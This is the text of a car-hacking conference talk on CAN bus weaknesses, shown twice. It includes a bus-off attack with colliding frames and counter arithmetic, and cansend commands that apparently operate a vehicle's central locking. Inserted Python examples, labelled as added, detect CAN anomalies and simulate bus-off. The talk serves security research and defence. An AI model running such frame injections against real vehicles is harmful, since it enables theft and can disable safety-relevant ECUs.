1
Car Hacking:
From Angelina Jolie to Charlize Theron
2
The mechanics we have always known
3
The mechanics we have always known
4
The mechanics we have always known
5
Mercedes 300: The beginning
6
What is an ECU?
• An ECU is an embedded system that controls/monitors systems in a car.
• The combination of ECUs is known as the car's computer.
• The car's “computer” is not one system but a large number of small subsystems connected together by a network.
7
What is an ECU?
• More than 80 ECUs in a car.
• Each ECU (Electronic Control Unit) connected in the car represents a separate point of vulnerability to a cyber attack.
• If one ECU is compromised, it’s a gateway to every other ECU in the vehicle.
• Terabytes of data travel between vehicles, cloud networks, wearables and mobile devices, and, obviously, they represent a desirable target for cybercriminals.
8
What is an ECU?
• The CAN bus is a 30-year-old architecture. CAN contains numerous vulnerabilities that are inherent in its design.
• Lack of segmentation and boundary defense.
• Lack of device authentication.
• Unencrypted traffic.
• Security by obscurity is not security at all.
9
Security… by obscurity
10
11
12
Evolution of threats
Early hacks | Recent hacks
13
Evolution of threats
• Hackers can steal a Tesla Model S in seconds by cloning its key fob: https://www.wired.com/story/hackers-steal-tesla-model-s-seconds-key-fob/
14
Evolution of threats
• A Dutch first: Ingenious BMW theft attempt: https://mrooding.me/a-dutch-first-ingenious-bmw-theft-attempt-5f7f49a96ec8
15
How do you get in?
16
Our lab
17
Our lab
18
Bus-off attack
• Fault tolerance
• 5 errors: bit error, stuff error, CRC error, form error, ACK error
• Counters
– TEC: transmit error counter
– REC: receive error counter
• States: error-active, error-passive, bus-off
– error-active → error-passive: TEC > 127 | REC > 127
– error-passive → error-active: TEC < 128 & REC < 128
– error-passive → bus-off: TEC > 255
– bus-off → error-active: Reset | 128x11 recessive bits
19
Bus-off attack
[Figure: bit sequences on the bus]
20
Bus-off attack
• Attack conditions
– Same ID
– Same time
– Different data
0x107 8 0x08 0xA0 0xFE 0x04 0x80 0x00 0x00 0x04
0x107 8 0x08 0x80 0xFE 0x04 0x80 0x00 0x00 0x04
0 0 0 0 1 0 0 0 1 0 1 0 0 0 0 0 0
0 0 0 0 1 0 0 0 1 0 0 0 1 0 0 0 0 0 0
Error raised: TEC1 + 8
Error raised: TEC2 + 8
TEC = 128
0 0 0 0 1 0 0 0 1 0 1
0 0 0 0 1 0 0 0 1 0 0 0 1 , , ,
Error raised: TEC1 + 8, TEC2 - 1
TEC1 = 255
Bus-off
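The counter arithmetic from the two bus-off slides, as an added example that is not part of the original deck: a small model of CAN fault confinement that replays transmit outcomes per node and lists every state change, which is the signal a bus monitor would alert on. The thresholds and the +8 / -1 steps are the ones on the slides; the names `Node`, `replay`, `state_changes`, `ecu1`/`ecu2` and the event sequence are assumptions constructed for illustration.

```python
"""CAN fault confinement (TEC/REC) replayed for monitoring.

Added example: thresholds and the +8 / -1 steps come from the slides;
all names and the sample event sequence are constructed.
"""
from dataclasses import dataclass, field

ERROR_ACTIVE = "error-active"
ERROR_PASSIVE = "error-passive"
BUS_OFF = "bus-off"
OUTCOMES = {"tx_error", "tx_ok", "recover"}


@dataclass
class Node:
    name: str
    tec: int = 0                      # transmit error counter
    rec: int = 0                      # receive error counter
    state: str = ERROR_ACTIVE
    history: list = field(default_factory=list)  # (event index, new state)

    def _refresh(self, idx):
        """Recompute the state from the counters and record any change."""
        if self.tec > 255:
            new = BUS_OFF
        elif self.tec > 127 or self.rec > 127:
            new = ERROR_PASSIVE
        else:
            new = ERROR_ACTIVE
        if new != self.state:
            self.state = new
            self.history.append((idx, new))

    def apply(self, outcome, idx):
        if outcome not in OUTCOMES:
            raise ValueError(f"unknown outcome: {outcome!r}")
        if outcome == "recover":      # reset, or 128 x 11 recessive bits seen
            self.tec = self.rec = 0
        elif self.state == BUS_OFF:
            return                    # a bus-off node stays silent until it recovers
        elif outcome == "tx_error":
            self.tec += 8
        else:                         # tx_ok
            self.tec = max(0, self.tec - 1)
        self._refresh(idx)


def replay(events):
    """events: iterable of (node name, outcome). Returns {name: Node}."""
    nodes = {}
    for idx, (name, outcome) in enumerate(events):
        nodes.setdefault(name, Node(name)).apply(outcome, idx)
    return nodes


def state_changes(nodes):
    """Merged, time-ordered list of (event index, node name, new state)."""
    return sorted((idx, n.name, st) for n in nodes.values() for idx, st in n.history)


def slide_sequence():
    """Constructed sequence following the slide's two stages."""
    events = []
    # Stage 1: both transmitters raise an error on every attempt (+8 each).
    for _ in range(16):
        events += [("ecu1", "tx_error"), ("ecu2", "tx_error")]
    # Stage 2: ecu1 keeps raising errors (+8) while ecu2 transmits cleanly (-1).
    for _ in range(16):
        events += [("ecu1", "tx_error"), ("ecu2", "tx_ok")]
    return events


if __name__ == "__main__":
    result = replay(slide_sequence())
    for idx, name, state in state_changes(result):
        print(f"event {idx:3d}: {name} -> {state}")
    for node in result.values():
        print(f"{node.name}: TEC={node.tec} state={node.state}")
```

A node that goes error-passive and then bus-off while a peer drops straight back to error-active is the asymmetric pattern worth alerting on; ordinary wiring faults tend to push up the counters of every node on the segment.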
21
Bus-off attack
22
Bus-off attack (Bonus track)
23
Central locking
cansend can0 184#61A40A0009000200
cansend can0 366#0010001E80030000
cansend can0 184#2F51050118000200
cansend can0 366#0010001E80030000
24
Central locking
25
Park assistant
26
Park assistant
• Parking operation ~ 1 min
– 60,000 CAN messages
– 150 IDs

ID   Byte 0  Byte 1  Byte 2  Byte 3  Byte 4  Byte 5  Byte 6  Byte 7
130  EB      6A      16      00      06      00      04      80
130  8F      6B      16      00      06      00      04      80
130  9C      6C      16      00      06      00      04      80
130  CB      6D      15      00      06      00      04      80
130  01      6E      13      00      06      00      04      80
130  A2      6F      11      00      06      00      04      80
130  C5      61      0E      00      06      00      04      80
27
Park assistant
28
GPS spoofing
29
The future
30
The future
31
The future
32
How we can protect ourselves
33
It does not look like it is going to stop being used
http://eecatalog.com/automotive/2013/03/13/automotive-communication-protocols-preparing-for-the-future/
34
How we can protect ourselves
• IDPS: Real-Time Detection and Neutralization
– CAN bus packet inspection
– Context analysis
– Detects malicious CAN messages using ML algorithms
– Zero-day detection (based on behavior)
– Low delay to manage the HUGE amount of data
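A minimal sketch of the packet-inspection and behaviour-based idea on this slide, added here as an example and not the product or code the speakers describe: it learns, from a known-good capture in candump log format, which IDs exist and how often each one arrives, then flags unknown IDs and frames that arrive much faster than the learned period. A median inter-arrival baseline stands in for the ML algorithms the slide mentions; the timestamps, the ID 5A1, the all-zero payloads and the 0.5 ratio are constructed, and IDs 130 and 184 from the slides are assumed to be hexadecimal.

```python
"""Baseline-and-deviation check over candump log lines (added example)."""
import re
from collections import defaultdict
from statistics import median

# candump log format: (timestamp) interface ID#DATA  (classic CAN data frames only;
# remote frames and CAN FD lines are reported as malformed by this sketch)
LINE_RE = re.compile(r"^\((\d+\.\d+)\)\s+(\S+)\s+([0-9A-Fa-f]{3,8})#([0-9A-Fa-f]*)$")


def parse_line(line):
    """Return (timestamp, can_id, payload) or None if the line is not a data frame."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts, _iface, can_id, data = m.groups()
    if len(data) % 2 or len(data) > 16:   # whole bytes, at most 8 of them
        return None
    return float(ts), int(can_id, 16), bytes.fromhex(data)


def learn_baseline(lines):
    """Map each ID seen in known-good traffic to its median inter-arrival time."""
    last_seen, gaps = {}, defaultdict(list)
    for line in lines:
        frame = parse_line(line)
        if frame is None:
            continue
        ts, can_id, _ = frame
        if can_id in last_seen:
            gaps[can_id].append(ts - last_seen[can_id])
        last_seen[can_id] = ts
    return {cid: (median(gaps[cid]) if gaps[cid] else None) for cid in last_seen}


def detect(lines, baseline, min_ratio=0.5):
    """Return alerts as (kind, can_id, timestamp) tuples, in capture order."""
    alerts, last_seen = [], {}
    for line in lines:
        if not line.strip():
            continue
        frame = parse_line(line)
        if frame is None:
            alerts.append(("malformed", None, None))
            continue
        ts, can_id, _ = frame
        if can_id not in baseline:
            alerts.append(("unknown-id", can_id, ts))
        else:
            period, prev = baseline[can_id], last_seen.get(can_id)
            # An extra sender on an existing ID shows up as a shortened gap.
            if period and prev is not None and (ts - prev) < period * min_ratio:
                alerts.append(("too-fast", can_id, ts))
        last_seen[can_id] = ts
    return alerts


# Constructed known-good capture: 130 every 20 ms, 184 every 100 ms.
BASELINE_LOG = """
(100.000000) can0 130#EB6A160006000480
(100.000500) can0 184#0000000000000000
(100.020000) can0 130#8F6B160006000480
(100.040000) can0 130#9C6C160006000480
(100.060000) can0 130#CB6D150006000480
(100.100500) can0 184#0000000000000000
(100.200500) can0 184#0000000000000000
""".strip()

# Constructed capture under test: an early 184 frame, an unseen ID, a broken line.
LIVE_LOG = """
(200.000000) can0 130#016E130006000480
(200.000500) can0 184#0000000000000000
(200.020000) can0 130#A26F110006000480
(200.030500) can0 184#0000000000000000
(200.040000) can0 130#C5610E0006000480
(200.041000) can0 5A1#0000000000000000
garbage line
""".strip()

if __name__ == "__main__":
    learned = learn_baseline(BASELINE_LOG.splitlines())
    for kind, can_id, ts in detect(LIVE_LOG.splitlines(), learned):
        ident = f"{can_id:03X}" if can_id is not None else "-"
        print(f"{kind:10s} id={ident} ts={ts}")
```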
35
Acknowledgements
• To XXXX: for voiding the car's warranty the first time we showed up with a bricked ECU:
36
37
Thank you very much
Carlos Sahuquillo Pascual
Automotive CyberSecurity Consultant
@csahuqui on Twitter
https://sahuquillo.org
Igor Robles Puente
Automotive CyberSecurity Research Engineer

Carlos Sahuquillo - Car Hacking: From Angelina Jolie to Charlize Theron [rootedvlc2018]

  • 1. Car Hacking: From Angelina Jolie to Charlize Theron
  • 2. Old-school mechanics
  • 3. Old-school mechanics
  • 4. Old-school mechanics
  • 6. What is an ECU?
      • An ECU is an embedded system that controls/monitors systems in a car.
      • The combination of ECUs is known as the car's computer.
      • The car's “computer” is not one system but a large number of small subsystems connected together by a network.
  • 7. What is an ECU?
      • More than 80 ECUs in a car.
      • Each ECU (Electronic Control Unit) connected in a car represents a separate point of vulnerability to a cyber attack.
      • If one ECU is compromised, it is a gateway to every other ECU in the vehicle.
      • Terabytes of data travel between vehicles, cloud networks, wearables and mobile devices, and they are obviously a desirable target for cybercriminals.
  • 8. What is an ECU?
      • The CAN bus is a 30-year-old architecture. CAN contains numerous vulnerabilities that are inherent in its design.
      • Lack of segmentation and boundary defense.
      • Lack of device authentication.
      • Unencrypted traffic.
      • Security by obscurity is not security at all.
  • 12. Threat evolution
      • Early hacks
      • Recent hacks
  • 13. Threat evolution
      • Hackers can steal a Tesla Model S in seconds by cloning its key fob: https://www.wired.com/story/hackers-steal-tesla-model-s-seconds-key-fob/
  • 14. Threat evolution
      • A Dutch first: Ingenious BMW theft attempt: https://mrooding.me/a-dutch-first-ingenious-bmw-theft-attempt-5f7f49a96ec8
  • 18. Bus-off attack
      • Fault tolerance
      • 5 errors: bit error, stuff error, CRC error, form error, ACK error
      • Counters
          – TEC: transmit error counter
          – REC: receive error counter
      • State diagram
          – error-active → error-passive: TEC > 127 | REC > 127
          – error-passive → error-active: TEC < 128 & REC < 128
          – error-passive → bus-off: TEC > 255
          – bus-off → error-active: Reset | 128x11 recessive bits
  • 19. Bus-off attack (figure: bit-sequence diagram)
  • 20. Bus-off attack
      • Attack conditions
          – Same ID
          – Same time
          – Different data
      • Frames (ID, length, data bytes)
          0x107 8 0x08 0xA0 0xFE 0x04 0x80 0x00 0x00 0x04
          0x107 8 0x08 0x80 0xFE 0x04 0x80 0x00 0x00 0x04
      • (Figure: bit-level view of the two data fields, which differ in the second byte: 0xA0 vs 0x80)
      • Error raised: TEC1 + 8, TEC2 + 8, ... TEC = 128
      • Error raised: TEC1 + 8, TEC2 - 1, ... TEC1 = 255: bus-off
  • 23. Central locking
      cansend can0 184#61A40A0009000200
      cansend can0 366#0010001E80030000
      cansend can0 184#2F51050118000200
      cansend can0 366#0010001E80030000
  • 26. Park assistant
      • Parking operation ~ 1 min
          – 60,000 CAN messages
          – 150 IDs
      ID   Byte 0  Byte 1  Byte 2  Byte 3  Byte 4  Byte 5  Byte 6  Byte 7
      130  EB      6A      16      00      06      00      04      80
      130  8F      6B      16      00      06      00      04      80
      130  9C      6C      16      00      06      00      04      80
      130  CB      6D      15      00      06      00      04      80
      130  01      6E      13      00      06      00      04      80
      130  A2      6F      11      00      06      00      04      80
      130  C5      61      0E      00      06      00      04      80
  • 33. It does not look like it is going to stop being used: http://eecatalog.com/automotive/2013/03/13/automotive-communication-protocols-preparing-for-the-future/
  • 34. How we can protect ourselves
      • IDPS: real-time detection and neutralization
          – CAN bus packet inspection
          – Context analysis
          – Detects malicious CAN messages using ML algorithms
          – Zero-day detection (based on behavior)
          – Low delay to manage the HUGE amount of data
  • 35. Acknowledgements
      • To XXXX: for voiding the car's warranty the first time we showed up with a bricked ECU:
  • 37. Thank you very much
      • Carlos Sahuquillo Pascual, Automotive CyberSecurity Consultant, @csahuqui on Twitter, https://sahuquillo.org
      • Igor Robles Puente, Automotive CyberSecurity Research Engineer
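
The counter arithmetic on slides 18 and 20, carried through as an added example (not code from the talk): a pure-software model of the two transmit error counters, using the slide-18 thresholds, so node 1 is counted as bus-off once TEC1 exceeds 255. The `Node` class, `simulate` and the `steep_tec_rise` monitoring rule are hypothetical names; the rule assumes a monitor can sample a controller's TEC.

```python
from dataclasses import dataclass

ERROR_PASSIVE_ABOVE = 127  # slide 18: TEC > 127 -> error-passive
BUS_OFF_ABOVE = 255        # slide 18: TEC > 255 -> bus-off

@dataclass
class Node:
    tec: int = 0  # transmit error counter

    @property
    def state(self) -> str:
        if self.tec > BUS_OFF_ABOVE:
            return "bus-off"
        if self.tec > ERROR_PASSIVE_ABOVE:
            return "error-passive"
        return "error-active"

def simulate(max_collisions: int = 100):
    """Replay slide 20; return (collision, TEC1, TEC2, state of node 1) rows."""
    n1, n2 = Node(), Node()
    trace = []
    for n in range(1, max_collisions + 1):
        both_active = n1.state == "error-active" and n2.state == "error-active"
        n1.tec += 8                      # TEC1 + 8 on every collision
        if both_active:
            n2.tec += 8                  # phase 1: TEC2 + 8 as well
        else:
            n2.tec = max(0, n2.tec - 1)  # phase 2: TEC2 - 1
        trace.append((n, n1.tec, n2.tec, n1.state))
        if n1.state == "bus-off":
            break
    return trace

def steep_tec_rise(tec_samples, window: int = 4) -> bool:
    """Hypothetical monitoring rule: TEC rose by exactly 8 in `window` samples in a row."""
    run = 0
    for prev, cur in zip(tec_samples, tec_samples[1:]):
        run = run + 1 if cur - prev == 8 else 0
        if run >= window:
            return True
    return False

if __name__ == "__main__":
    trace = simulate()
    for row in trace:
        print(row)
    print("alert:", steep_tec_rise([r[1] for r in trace]))
```

In this model both counters reach 128 after 16 collisions, and node 1 crosses the bus-off threshold after 32 while the other counter has fallen back into the error-active range, which is why a steady +8 staircase on one node's TEC is a useful signal for an IDPS.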